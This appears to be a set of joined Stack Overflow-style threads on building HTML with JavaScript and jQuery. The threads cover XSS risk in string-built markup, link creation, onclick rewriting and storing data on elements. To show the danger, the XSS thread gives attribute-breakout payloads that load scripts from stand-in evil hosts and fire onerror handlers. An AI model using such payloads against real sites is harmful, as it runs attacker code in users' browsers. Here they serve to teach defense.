The company who hosts our site reviews our code before deploying - they've recently told us this:
HTML strings should never be directly manipulated, as that opens us up to potential XSS holes. Instead, always use a DOM api to create elements...that can be jQuery or the direct DOM apis.
For example, instead of
this.html.push( '<a class="quiz-au" data-src="' + this.au + '"><span class="quiz-au-icon"></span>Click to play</a>' );
They tell us to do
var quizAuLink = $( 'a' );
quizAuLink.addClass( 'quiz-au' );
quizAuLink.data( 'src', this.au );
quizAu.text( 'Click to play' );
quizAu.prepend( '<span class="quiz-au-icon"></span>' );
Is this really true? Can anyone give us an example of an XSS attack that could exploit an HTML string like the first one?
If this.au is somehow modified, it might contain something like this:
"><script src="http://example.com/evilScript.js"></script><span class="
That'll mess up your HTML and inject a script:
<a class="quiz-au" data-src=""><script src="http://example.com/evilScript.js"></script><span class=""><span class="quiz-au-icon"></span>Click to play</a>
If you use DOM manipulation to set the src attribute, the script (or whatever other XSS you use) won't be executed, as it'll be properly escaped by the DOM API.
In response to some commentators who are saying that if someone could modify this.au, surely they could run the script on their own: I don't know where this.au is coming from, nor is it particularly relevant. It could be a value from the database, and the DB might have been compromised. It could also be a malicious user trying to mess things up for other users. It could even be an innocent non-techie who didn't realize that writing "def" > "abc" would destroy things.
One more thing. In the code you provided, var quizAuLink = $( 'a' ); will not create a new <a> element. It'll just select all the existing ones. You need to use var quizAuLink = $( '<a>' ); to create a new one.
This should be just as secure, without compromising too much on readability:
var link = $('<a class="quiz-au"><span class="quiz-au-icon"></span>Click to play</a>');
link.data("src", this.au);
The point is to avoid doing string operations to build HTML strings. Note that in above, I used $() only to parse a constant string, which parses to a well known result. In this example, only the this.au part is dangerous because it may contain dynamically calculated values.
As you cannot inject script tags in modern browsers using .innerHTML you will need to listen to an event:
If this.au is somehow modified, it might contain something like this:
"><img src="broken-path.png" onerror="alert('my injection');"><span class="
That'll mess up your HTML and inject a script:
<a class="quiz-au" data-src=""><img src="broken-path.png" onload="alert('my injection')"><span class=""><span class="quiz-au-icon"></span>Click to play</a>
And ofcause to run bigger chunks of JavaScript set onerror to:
var d = document; s = d.createElement('script'); s.type='text/javascript'; s.src = 'www.my-evil-path.com'; d.body.appendChild(s);
Thanks to Scimoster for the boilerplate
Security aside, when you build HTML in JavaScript you must make sure that it is valid. While it is possible to build and sanitize HTML by string manipulation*, DOM manipulation is far more convenient. Still, you must know exactly which part of your string is HTML and which is literal text.
Consider the following example where we have two hard-coded variables:
var href = "/detail?tag=hr©%5B%5D=1",
text = "The HTML <hr> tag";
The following code naively builds the HTML string:
var div = document.createElement("div");
div.innerHTML = '' + text + '';
console.log(div.innerHTML);
// The HTML <hr> tag
This uses jQuery but it is still incorrect (it uses .html() on a variable that was supposed to be text):
var div = document.createElement("div");
$("<a></a>").attr("href", href).html(text).appendTo(div);
console.log(div.innerHTML);
// The HTML <hr> tag
This is correct because it displays the text as intended:
var div = document.createElement("div");
$("<a></a>").attr("href", href).text(text).appendTo(div);
console.log(div.innerHTML);
// The HTML <hr> tag
Conclusion: Using DOM manipulation/jQuery do not guarantee any security, but it sure is one step in right direction.
* See this question for examples. Both string and DOM manipulation are discussed.
There might be a duplicate of this (I've tried checking questions on creating dynamic links but they reference a static link - I want this link to be hidden from the user). On testing the following code on the ww3 site:
<!DOCTYPE html>
<html>
<body>
<script type="text/javascript">
document.write("<a href="www.google.com">Google</a>");
</script>
</body>
</html>
I get:
http://www.w3schools.com/jsref/%22www.google.com%22
As the link address rather than www.google.com.
How do I correct this problem? And how do I make it so the link only appears after a set time? Note, this is a simplified version of the code for readability (the dynamic link will including two floating point variables assigned at the time the script is run).
An <a> tag's href must include the protocol http://, otherwise it links to a document relative to the page the link is on:
// Print quote literals, not html entities `"`
document.write("<a href='http://www.google.com'>Google</a>");
The use cases for document.write() are often limited since it can't be used after the page has loaded without overwriting the whole thing. A lot of the time you will want to create the element after the page has already rendered. In that case, you would use document.createElement() and appendChild().
// Create the node...
var newlink = document.createElement('a');
newlink.href = 'http://www.google.com';
// Set the link's text:
newlink.innerText = "Google";
// And add it to the appropriate place in the DOM
// This just sticks it onto the <body>
// You might, for example, instead select a specific <span> or <div>
// by its id with document.getElementById()
document.body.appendChild(newlink);
By the way, w3schools is not affiliated with the W3C, and their examples are generally not recommended since they are often out of date or incomplete.
You have 2 issues:
1) You need http:// before the URL so it's: http://www.google.com
2) You don't need to use quotes in document.write, but if you want to you can do one of these 3:
document.write('Google');
document.write("<a href='http://www.google.com'>Google</a>");
document.write("<a href=http://www.google.com>Google</a>");
Use the slash "\" to escape the quote
To make the link absolute, include the "http://" at the start of the url. Write out:
<a href="http://www.google.com">
instead of
<a href="www.google.com">
The second example will be treated as a relative url, like index.html for example.
I have this HTML:
Track Your Package »
Somebody on this site was able to provide me with a script to prefix the URL with the domain http://www.example.com/ Here's the script:
$(document).ready(function(){
$('a[onclick^="window.open(\'TrackPackage.asp"]').attr('onClick', $('a[onclick^="window.open(\'TrackPackage.asp"]').attr('onClick').replace("window.open('", "window.open('http://www.example.com/"));
});
However, I am having a little trouble with this:
The first issue is where there is multiple instances of the element. Here's a fiddle: http://jsfiddle.net/VMmZx/
Instead of one anchor being signed with ID=4 and the other with ID=5 as intended, they're both being signed with ID=4.
The idea is, each window.open function should be prefixed with http://www.example.com however, the remainder of the URL should remain intact...
The second problem I'm encountering is when the element does not exist on a page, the remainder of the jQuery fails...
Here's another fiddle: http://jsfiddle.net/VPf32/
The <a> should get the class foo, but since the element does not exist on the page, the jQuery does not execute.
Since the JavaScript is being included in the HTML template of the ASP.NET server, this can create many problems.
I hope I've been clear and you can help me. Thanks.
You can use .each() to iterate over each matching element and change them individually:
$('a[onclick^="window.open(\'TrackPackage.asp"]').each(function(index, element) {
element = $(element);
element.attr('onclick', element.attr('onclick').replace(/open\('/, 'open(\'http://www.example.com/'));
});
However, I don't think using links with a href of # and an onclick opening a window is as semantic as it could be. If possible, try changing the markup to this:
Track Your Package »
Now if someone is curious where it will lead them, the browser can show something useful in the status bar when you hover over it.
If you need to adjust the behavior further, add a class and bind for the click event. When they click, prevent the default action and open the window yourself, as you did before.
Why are you doing the click even inline like that? I would just output the links like:
Link Text
And then:
$('a[target=_blank]').click(function(){
var prefix = 'http://domain.com';
window.open(prefix + $(this).attr('href'));
});
I'm making a page which has some interaction provided by javascript. Just as an example: links which send an AJAX request to get the content of articles and then display that data in a div. Obviously in this example, I need each link to store an extra bit of information: the id of the article. The way I've been handling it in case was to put that information in the href link this:
<a class="article" href="#5">
I then use jQuery to find the a.article elements and attach the appropriate event handler. (don't get too hung up on the usability or semantics here, it's just an example)
Anyway, this method works, but it smells a bit, and isn't extensible at all (what happens if the click function has more than one parameter? what if some of those parameters are optional?)
The immediately obvious answer was to use attributes on the element. I mean, that's what they're for, right? (Kind of).
<a articleid="5" href="link/for/non-js-users.html">
In my recent question I asked if this method was valid, and it turns out that short of defining my own DTD (I don't), then no, it's not valid or reliable. A common response was to put the data into the class attribute (though that might have been because of my poorly-chosen example), but to me, this smells even more. Yes it's technically valid, but it's not a great solution.
Another method I'd used in the past was to actually generate some JS and insert it into the page in a <script> tag, creating a struct which would associate with the object.
var myData = {
link0 : {
articleId : 5,
target : '#showMessage'
// etc...
},
link1 : {
articleId : 13
}
};
<a href="..." id="link0">
But this can be a real pain in butt to maintain and is generally just very messy.
So, to get to the question, how do you store arbitrary pieces of information for HTML tags?
Which version of HTML are you using?
In HTML 5, it is totally valid to have custom attributes prefixed with data-, e.g.
<div data-internalid="1337"></div>
In XHTML, this is not really valid. If you are in XHTML 1.1 mode, the browser will probably complain about it, but in 1.0 mode, most browsers will just silently ignore it.
If I were you, I would follow the script based approach. You could make it automatically generated on server side so that it's not a pain in the back to maintain.
If you are using jQuery already then you should leverage the "data" method which is the recommended method for storing arbitrary data on a dom element with jQuery.
To store something:
$('#myElId').data('nameYourData', { foo: 'bar' });
To retrieve data:
var myData = $('#myElId').data('nameYourData');
That is all that there is to it but take a look at the jQuery documentation for more info/examples.
Just another way, I personally wouldn't use this but it works (assure your JSON is valid because eval() is dangerous).
<a class="article" href="link/for/non-js-users.html">
<span style="display: none;">{"id": 1, "title":"Something"}</span>
Text of Link
</a>
// javascript
var article = document.getElementsByClassName("article")[0];
var data = eval(article.childNodes[0].innerHTML);
Arbitrary attributes are not valid, but are perfectly reliable in modern browsers. If you are setting the properties via javascript, than you don't have to worry about validation as well.
An alternative is to set attributes in javascript. jQuery has a nice utility method just for that purpose, or you can roll your own.
A hack that's going to work with pretty much every possible browser is to use open classes like this: <a class='data\_articleid\_5' href="link/for/non-js-users.html>;
This is not all that elegant to the purists, but it's universally supported, standard-compliant, and very easy to manipulate. It really seems like the best possible method. If you serialize, modify, copy your tags, or do pretty much anything else, data will stay attached, copied etc.
The only problem is that you cannot store non-serializable objects that way, and there might be limits if you put something really huge there.
A second way is to use fake attributes like: <a articleid='5' href="link/for/non-js-users.html">
This is more elegant, but breaks standard, and I'm not 100% sure about support. Many browsers support it fully, I think IE6 supports JS access for it but not CSS selectors (which doesn't really matter here), maybe some browsers will be completely confused, you need to check it.
Doing funny things like serializing and deserializing would be even more dangerous.
Using ids to pure JS hash mostly works, except when you try to copy your tags. If you have tag <a href="..." id="link0">, copy it via standard JS methods, and then try to modify data attached to just one copy, the other copy will be modified.
It's not a problem if you don't copy tags, or use read only data. If you copy tags and they're modified you'll need to handle that manually.
Using jquery,
to store: $('#element_id').data('extra_tag', 'extra_info');
to retrieve: $('#element_id').data('extra_tag');
I know that you're currently using jQuery, but what if you defined the onclick handler inline. Then you could do:
<a href='/link/for/non-js-users.htm' onclick='loadContent(5);return false;'>
Article 5</a>
You could use hidden input tags. I get no validation errors at w3.org with this:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>
<meta content="text/html;charset=UTF-8" http-equiv="content-type" />
<title>Hello</title>
</head>
<body>
<div>
<a class="article" href="link/for/non-js-users.html">
<input style="display: none" name="articleid" type="hidden" value="5" />
</a>
</div>
</body>
</html>
With jQuery you'd get the article ID with something like (not tested):
$('.article input[name=articleid]').val();
But I'd recommend HTML5 if that is an option.
Why not make use of the meaningful data already there, instead of adding arbitrary data?
i.e. use <a href="/articles/5/page-title" class="article-link">, and then you can programmatically get all article links on the page (via the classname) and the article ID (matching the regex /articles\/(\d+)/ against this.href).
As a jQuery user I would use the Metadata plugin. The HTML looks clean, it validates, and you can embed anything that can be described using JSON notation.
This is good advice. Thanks to #Prestaul
If you are using jQuery already then you should leverage the "data"
method which is the recommended method for storing arbitrary data on a
dom element with jQuery.
Very true, but what if you want to store arbitrary data in plain-old HTML? Here's yet another alternative...
<input type="hidden" name="whatever" value="foobar"/>
Put your data in the name and value attributes of a hidden input element. This might be useful if the server is generating HTML (i.e. a PHP script or whatever), and your JavaScript code is going to use this information later.
Admittedly, not the cleanest, but it's an alternative. It's compatible with all
browsers and is valid XHTML. You should NOT use custom attributes, nor should you really use attributes with the 'data-' prefix, as it might not work on all browsers. And, in addition, your document will not pass W3C validation.
As long as you're actual work is done serverside, why would you need custom information in the html tags in the output anyway? all you need to know back on the server is an index into whatever kind of list of structures with your custom info. I think you're looking to store the information in the wrong place.
I will recognize, however unfortunate, that in lots of cases the right solution isn't the right solution. In which case I would strongly suggest generating some javascript to hold the extra information.
Many years later:
This question was posted roughly three years before data-... attributes became a valid option with the advent of html 5 so the truth has shifted and the original answer I gave is no longer relevant. Now I'd suggest to use data attributes instead.
<a data-articleId="5" href="link/for/non-js-users.html">
<script>
let anchors = document.getElementsByTagName('a');
for (let anchor of anchors) {
let articleId = anchor.dataset.articleId;
}
</script>
I advocate use of the "rel" attribute. The XHTML validates, the attribute itself is rarely used, and the data is efficiently retrieved.
So there should be four choices to do so:
Put the data in the id attribute.
Put the data in the arbitrary attribute
Put the data in class attribute
Put your data in another tag
http://www.shanison.com/?p=321
You could use the data- prefix of your own made attribute of a random element (<span data-randomname="Data goes here..."></span>), but this is only valid in HTML5. Thus browsers may complain about validity.
You could also use a <span style="display: none;">Data goes here...</span> tag. But this way you can not use the attribute functions, and if css and js is turned off, this is not really a neat solution either.
But what I personally prefer is the following:
<input type="hidden" title="Your key..." value="Your value..." />
The input will in all cases be hidden, the attributes are completely valid, and it will not get sent if it is within a <form> tag, since it has not got any name, right?
Above all, the attributes are really easy to remember and the code looks nice and easy to understand. You could even put an ID-attribute in it, so you can easily access it with JavaScript as well, and access the key-value pair with input.title; input.value.
One possibility might be:
Create a new div to hold all the extended/arbitrary data
Do something to ensure that this div is invisible (e.g. CSS plus a class attribute of the div)
Put the extended/arbitrary data within [X]HTML tags (e.g. as text within cells of a table, or anything else you might like) within this invisible div
Another approach can be to store a key:value pair as a simple class using the following syntax :
<div id="my_div" class="foo:'bar'">...</div>
This is valid and can easily be retrieved with jQuery selectors or a custom made function.
In html, we can store custom attributes with the prefix 'data-' before the attribute name like
<p data-animal='dog'>This animal is a dog.</p>.
Check documentation
We can use this property to dynamically set and get attributes using jQuery like:
If we have a p tag like
<p id='animal'>This animal is a dog.</p>
Then to create an attribute called 'breed' for the above tag, we can write:
$('#animal').attr('data-breed', 'pug');
To retrieve the data anytime, we can write:
var breedtype = $('#animal').data('breed');
At my previous employer, we used custom HTML tags all the time to hold info about the form elements. The catch: We knew that the user was forced to use IE.
It didn't work well for FireFox at the time. I don't know if FireFox has changed this or not, but be aware that adding your own attributes to HTML elements may or may-not be supported by your reader's browser.
If you can control which browser your reader is using (i.e. an internal web applet for a corporation), then by all means, try it. What can it hurt, right?
This is how I do you ajax pages... its a pretty easy method...
function ajax_urls() {
var objApps= ['ads','user'];
$("a.ajx").each(function(){
var url = $(this).attr('href');
for ( var i=0;i< objApps.length;i++ ) {
if (url.indexOf("/"+objApps[i]+"/")>-1) {
$(this).attr("href",url.replace("/"+objApps[i]+"/","/"+objApps[i]+"/#p="));
}
}
});
}
How this works is it basically looks at all URLs that have the class 'ajx' and it replaces a keyword and adds the # sign... so if js is turned off then the urls would act as they normally do... all "apps" (each section of the site) has its own keyword... so all i need to do is add to the js array above to add more pages...
So for example my current settings are set to:
var objApps= ['ads','user'];
So if i have a url such as:
www.domain.com/ads/3923/bla/dada/bla
the js script would replace the /ads/ part so my URL would end up being
www.domain.com/ads/#p=3923/bla/dada/bla
Then I use jquery bbq plugin to load the page accordingly...
http://benalman.com/projects/jquery-bbq-plugin/
I have found the metadata plugin to be an excellent solution to the problem of storing arbitrary data with the html tag in a way that makes it easy to retrieve and use with jQuery.
Important: The actual file you include is is only 5 kb and not 37 kb (which is the size of the complete download package)
Here is an example of it being used to store values I use when generating a google analytics tracking event (note: data.label and data.value happen to be optional params)
$(function () {
$.each($(".ga-event"), function (index, value) {
$(value).click(function () {
var data = $(value).metadata();
if (data.label && data.value) {
_gaq.push(['_trackEvent', data.category, data.action, data.label, data.value]);
} else if (data.label) {
_gaq.push(['_trackEvent', data.category, data.action, data.label]);
} else {
_gaq.push(['_trackEvent', data.category, data.action]);
}
});
});
});
<input class="ga-event {category:'button', action:'click', label:'test', value:99}" type="button" value="Test"/>
My answer might not apply to your case. I needed to store a 2D table in HTML, and i needed to do with fewest possible keystrokes. Here's my data in HTML:
<span hidden id="my-data">
IMG,,LINK,,CAPTION
mypic.jpg,,khangssite.com,,Khang Le
funnypic.jpg,,samssite.com,,Smith, Sam
sadpic.png,,joyssite.com,,Joy Jones
sue.jpg,,suessite.com,,Sue Sneed
dog.jpg,,dogssite.com,,Brown Dog
cat.jpg,,catssite.com,,Black Cat
</span>
Explanation
It's hidden using hidden attribute. No CSS needed.
This is processed by Javascript. I use two split statements, first on newline, then on double-comma delimiter. That puts the whole thing into a 2D array.
I wanted to minimize typing. I didn't want to redundantly retype the fieldnames on every row (json/jso style), so i just put the fieldnames on the first row. That a visual key for the programmer, and also used by Javascript to know the fieldnames. I eliminated all braces, brackets, equals, parens, etc. End-of-line is record delimiter.
I use double-commas as delimiters. I figured no one would normally use double-commas for anything, and they're easy to type. Beware, programmer must enter a space for any empty cells, to prevent unintended double-commas. The programmer can easily use a different delimiter if they prefer, as long as they update the Javascript. You can use single-commas if you're sure there will be no embedded commas within a cell.
It's a span to ensure it takes up no room on the page.
Here's the Javascript:
// pull 2D text-data into array
let sRawData = document.querySelector("#my-data").innerHTML.trim();
// get headers from first row of data and load to array. Trim and split.
const headersEnd = sRawData.indexOf("\n");
const headers = sRawData.slice(0, headersEnd).trim().split(",,");
// load remaining rows to array. Trim and split.
const aRows = sRawData.slice(headersEnd).trim().split("\n");
// trim and split columns
const data = aRows.map((element) => {
return element.trim().split(",,");
});
Explanation:
JS uses lots of trims to get rid of any extra whitespace.